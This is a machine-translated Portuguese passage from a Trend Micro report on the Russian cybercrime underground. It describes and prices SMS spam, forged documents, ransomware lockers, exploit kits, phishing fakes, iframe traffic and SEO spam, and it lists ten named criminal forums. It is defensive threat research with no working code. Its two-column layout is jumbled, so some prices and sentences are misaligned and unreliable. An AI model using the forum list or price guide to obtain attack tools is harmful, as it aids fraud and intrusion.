Russo e outros US$ 2–5 Serviço de spam por SMS (todos US$3 por 100 mensagens de texto
Comunidade de Operadores russos) US$ 20 por 1.000 mensagens
Passaporte de país dos Estados de texto
Independentes (CEI) US$ 150 por 10.000 textos
mensagens
Passaporte europeu US$ 5
Serviço de spam por SMS (com substituição
Serviço de retrabalho de documentos US$ 15–20
de número de telefone) para:
Serviço de retrabalho de cartão de crédito US$ 25
Aqui está um exemplo de postagem cibercriminosa que oferece um banco de 8 mensagens de texto US$ 1,15
15 mensagens de texto US$ 1,95
dados de documentos (traduzido do russo):
20 mensagens de texto US$ 2,75
30 mensagens de texto US$ 4,15
“Banco de dados de documentos (passaporte, cc, carteira de motorista,
50 mensagens de texto US$ 6,95
conta de luz, extrato bancário) preço: US$ 195; mais de 500 documentos e
modelos”
Tabela 12: Preços dos serviços de fraude de SMS
“Inundador de SMS PHP; velocidade: 2 SMS por segundo; preço: US$ 16”
A prática de extorsão online mais difundida envolve o uso de um bloqueador A venda de chaves de ativação de software é comum no
do Windows. Um bloqueador como o Winlocker é um tipo especial de mercado clandestino. Na verdade, as chaves seriais podem ser
malware projetado para paralisar o sistema operacional de um computador. facilmente obtidas a preços baixos.
Sua execução estimula o aparecimento de um prompt solicitando
ao usuário que deposite uma certa quantia de dinheiro na conta do Aqui estão exemplos de postagens de criminosos cibernéticos que oferecem
hacker para desbloquear seu sistema. chaves seriais (traduzidas do russo):
Às vezes, os Winlockers são vendidos no mercado clandestino, embora
raramente. “Windows 7 Ultimate: US$ 7, Windows 7 Professional: US$ 5,
Windows 7 Home Premium: US$ 3, WinServer 2008: US$ 5;
Preços de serviços de ransomware MS Office 2010: US$ 4; MS Office 2011 para Mac: US$4”
Explorações
Exploits [ÿÿÿÿÿÿÿ], também conhecidos como “sploits”, são programas, mais O alcance de uma exploração é uma medida de sua eficiência – a proporção
frequentemente scripts, que exploram vulnerabilidades em outros programas ou de usuários em cujos computadores a exploração funcionou em relação ao
aplicativos. O tipo mais comum são as explorações de navegador, que número total de usuários que visitaram uma página na qual ela estava
permitem o download de arquivos maliciosos. incorporada. Assim, se 1.000 usuários visitaram uma página carregada de
As explorações introduzem códigos que baixam e iniciam arquivos exploração e os computadores de 200 pessoas foram infectados com sucesso
executáveis no computador da vítima. por um Trojan, o alcance dessa exploração será igual a (200/1.000) *
100 ou 20%.
Um exemplo de ataque de exploração está causando um estouro de
buffer inteiro no método setSlice() no componente ActiveX As explorações XSS também estão disponíveis no mercado
WebViewFolderIcon. Usando uma página da web ou e-mail especialmente clandestino. A exploração da vulnerabilidade XSS ocorre quando um
construído, um usuário remoto pode corromper a memória de um computador script geralmente malicioso incorporado em um site é capaz de se comunicar
e executar código arbitrário. com o conteúdo de um site diferente ou de uma página HTML local, daí
A execução arbitrária de código ocorre quando uma pessoa que usa um seu nome. Ao contrário de outros ataques, os hackers utilizam servidores
navegador vulnerável navega para uma página da Web incorporada com suscetíveis ao XSS como intermediários para atacar os visitantes de sites
uma exploração. infectados, forçando os seus navegadores a executar scripts maliciosos.
Uma exploração XSS ativa, por outro lado, não requer nenhuma ação Aluguel do Styx Sploit Pack (afeta US$ 3.000 por mês
adicional por parte da vítima. Tudo o que a vítima precisa fazer é abrir Java e Adobe Acrobat e
uma página da web carregada de XSS para executar automaticamente Reprodutor Flash)
o código malicioso. Devido à sua natureza automatizada, as explorações Eleonore Exploit Pack v. 1.6.2 US$ 2.500–3.000
XSS ativas são mais caras. (para Microsoft Data Access
Components [MDAC], IEpeers,
SnapShot, HCP, JDT, JWS, PDF
Explorar preços collab,collectEmailInfo, PDF
SING e Java Invoke(chain) 1.5/1.6;
alcance médio de 10 –25%)
As explorações podem ser vendidas individualmente ou em pacotes. Alguns também
estão disponíveis para aluguel.
Phoenix Exploits Kit v. e PDF Lib US$ 2.200 por domínio
TIFF)
Falsificações Tráfego
Um falso é um programa que copia a interface de outro programa ou site para Tráfego [ÿÿÿÿ] refere-se ao fluxo de visitantes de um determinado site.
capturar certos tipos de dados, principalmente senhas. O objetivo principal de O volume de tráfego refere-se ao número de visitantes (ou seja, únicos ou não)
usar uma falsificação é induzir o usuário a inserir seu nome de usuário e senha ou de um site durante um determinado período de tempo. O tráfego usado pelos
outros tipos de dados confidenciais em um formulário. cibercriminosos pode ser dividido em duas categorias: tráfego para explorações
para obter downloads e tráfego para fins de blackhat SEO. Existem diversas
fontes de tráfego, incluindo sites hackeados, sites da lista branca, portas
Clientes ICQ falsos, bem como páginas de bancos e redes sociais são e distribuidores de spam.
vendidos online. As falsificações estão intimamente relacionadas ao phishing
– um dos métodos mais comuns usados para cometer fraudes online.
Phishing refere-se basicamente a um conjunto de ações para induzir os Porém, o tráfego iframe é mais comumente usado para obter downloads.
usuários a fornecer informações pessoais ou confidenciais. O phishing Para obter tráfego, um site é hackeado inserindo um iframe em uma de
moderno pode ser dividido em três tipos: online, e-mail e híbrido. suas páginas. Um iframe, também conhecido como “quadro embutido”, é
um “quadro flutuante”. Por estar oculto, os visitantes de sites invadidos são
O meio de phishing mais antigo é realizado por e-mail. direcionados, de forma inconsciente e automática, às páginas dos hackers.
Como resultado, os hackers obtêm muito tráfego, que podem vender ou usar
Enquanto isso, o phishing online depende do uso de falsificações e envolve a para fins maliciosos.
cópia de sites oficiais, mas usando nomes de domínio ou URLs de aparência
semelhante. Isso também é conhecido como “spoofing de site”, em que
usuários que visitam sites falsos digitam informações pessoais em formulários, O gerenciamento do conteúdo de sites invadidos pode ser feito por
acreditando que estão em sites oficiais. meio de uma conta FTP ou de um web shell. Um web shell é um programa
especial ou script projetado para gerenciar remotamente o conteúdo de um site.
Finalmente, o phishing híbrido envolve a criação de uma versão falsificada
do site legítimo de uma empresa. Os hackers incomodam os usuários com
instruções para incentivá-los a fazer algo nesses sites. O tráfego pode ser de natureza tópica, dependendo do tipo de site de onde
veio. O tráfego comercial é mais valioso porque os visitantes do site comercial
geralmente são pessoas sérias e com dinheiro. Como tal, é provável que os seus
Preços Falsos downloads se transformem em lucro para os hackers. O tráfego adulto (por exemplo,
tráfego de sites pornográficos) também merece ser mencionado, mesmo que seja
menos valioso porque os sites pornográficos recebem muitos visitantes.
As falsificações não são mais muito procuradas, principalmente devido
ao aumento do conhecimento de informática entre os usuários. Como tal, as
falsificações são bastante baratas. O tráfego é frequentemente classificado de acordo com os países dos
visitantes. O tráfego proveniente da Austrália, dos Estados Unidos, da Grã-
Domínio de phishing pré- US$ 50 cada O tráfego para fins de blackhat SEO aumenta o número de visitantes de um
pago de 1 ano (por exemplo, site selecionado. O tráfego é gerenciado por meio de um sistema de direção de
vk0ntakte.net.ua e vkontaktu.net.ua) tráfego (TDS).1
1 http://www.trendmicro.com/cloud-content/us/pdfs/security-
intelligence/reports/rpt_malware-distribution-tools.pdf
PÁGINA 23 | SUBTERRÂNEO RUSSO 101
Machine Translated by Google
Preços de tráfego SEO usa várias técnicas para promover sites e otimizá-los para pesquisas.
É um meio legítimo pelo qual as organizações conscientizam seus sites,
fazendo-os aparecer no topo das páginas de resultados de pesquisa.
Como esperado, o tráfego custa muito menos que os downloads.
O tráfego proveniente de países europeus e dos Estados Unidos é mais caro
(ou seja, 7 a 15 dólares por 1.000 visitantes) do que o tráfego proveniente de Um conceito importante frequentemente encontrado em relação ao SEO
outros países. No geral, a classificação do país em termos de preço é a mesma envolve o Topical Citation Index (TCI). É um método utilizado pelo motor
dos downloads. Às vezes, anúncios de TDSs podem ser encontrados, de busca Yandex para determinar a “autoridade” de um recurso da Internet
embora muito raramente. com base nas características dos links de outros sites para ele. O TCI
é calculado usando um algoritmo especialmente desenvolvido, no qual é
Aqui estão exemplos de postagens de criminosos cibernéticos que dada especial importância à “proximidade do tópico” de um recurso e dos
oferecem tráfego (traduzido do russo): sites vinculados a ele. Apenas valores aproximados são especificados, o
que ajuda a determinar aproximadamente a autoridade dos sites.
“Fluxo nos EUA de 50.000/ dia; iframe. Vou vender por US$ 9. 30% é tráfego
adulto; o resto está relacionado a filmes, músicas, jogos e namoro.”
• Utilização de perfis: Perfis com links para o site do cliente são cadastrados
nas home pages, resultando em backlinks “infinitos”.
Conclusão
• Uso do método ref spam: Consiste no envio de ref À medida que a comunidade clandestina russa modifica continuamente
solicitações para páginas de um site com referer=“your_ os alvos e melhora as tecnologias, as empresas e utilizadores de
website” definido na solicitação. Como resultado, o endereço do site segurança devem enfrentar constantemente o desafio de proteger
de um cliente é exibido em todos os sites em uma página especial, com eficazmente o seu dinheiro e as informações que armazenam nos seus
foco principalmente nos mecanismos de busca. computadores e outros dispositivos.
Banco de dados Xrumer com 30.000 A economia subterrânea russa é uma economia de escala, orientada para
sites (principalmente RU e EN): os serviços e que se tornou uma cleptocracia onde o capitalismo de compadrio
Postagem direta US$ 20 obteve uma nova vida no ciberespaço.
Postagem agressiva US$ 25
Uso do perfil US$ 20
Uso do método de spam de referência US$ 7
Apêndice
Com base em pesquisas contínuas e monitoramento de vários Os 10 principais fóruns onde os cibercriminosos russos compram e vendem
Nos fóruns clandestinos russos, avaliamos a popularidade de várias atividades seus produtos foram:
e/ou serviços maliciosos e os classificamos abaixo:
1.antichat.ru
2.xeka.ru
1. Serviços de programação e vendas de software 3.carding-cc.com
2. Serviços de hackers 4. Explorar.IN
3. Vendas de servidores dedicados e serviços de hospedagem à 5. Ataque
prova de balas 6. XaKePoK.su
4. Serviços de spam e inundação, incluindo serviços de inundação de 7. CLUBE HACKER-PRO (HPC)
chamadas e SMS 8. XAkNet.ru
5. Baixe vendas 9. zloi
6. Serviços DDoS 10. HackForce.RU
7. Vendas de tráfego
8. Serviços de criptografia de arquivos
9. Vendas de cavalos de Tróia
A Trend Micro Incorporated (TYO: 4704; TSE: 4704), líder global em segurança na 10101 N. De Anza Blvd.
nuvem, cria um mundo seguro para a troca de informações digitais com suas soluções Cupertino, CA 95014
de segurança de conteúdo da Internet e gerenciamento de ameaças para empresas e
consumidores. Pioneiros em segurança de servidores com mais Ligação gratuita nos EUA: 1 +800.228.5651
de 20 anos de experiência, oferecemos segurança de alto nível para clientes, Telefone: 1 +408.257.1500
servidores e baseada em nuvem que atende às necessidades de nossos Fax: 1 +408.257.2003
clientes e parceiros, interrompe novas ameaças mais rapidamente e protege dados www.trendmicro.com
em ambientes físicos, virtualizados e em nuvem . Alimentados pela infraestrutura de
segurança de computação em nuvem Trend Micro™ Smart Pro-tection Network™ líder
do setor, nossos produtos e serviços impedem ameaças onde elas surgem: na Internet.
Eles são apoiados por mais de 1.000 especialistas em inteligência de ameaças em todo o mundo.
©2012 da Trend Micro, Incorporated. Todos os direitos reservados. Trend Micro e o logotipo Trend Micro t-ball são marcas comerciais ou marcas registradas da Trend Micro, Incorporated. Todos os outros nomes de produtos ou
empresas podem ser marcas comerciais ou marcas registradas de seus proprietários.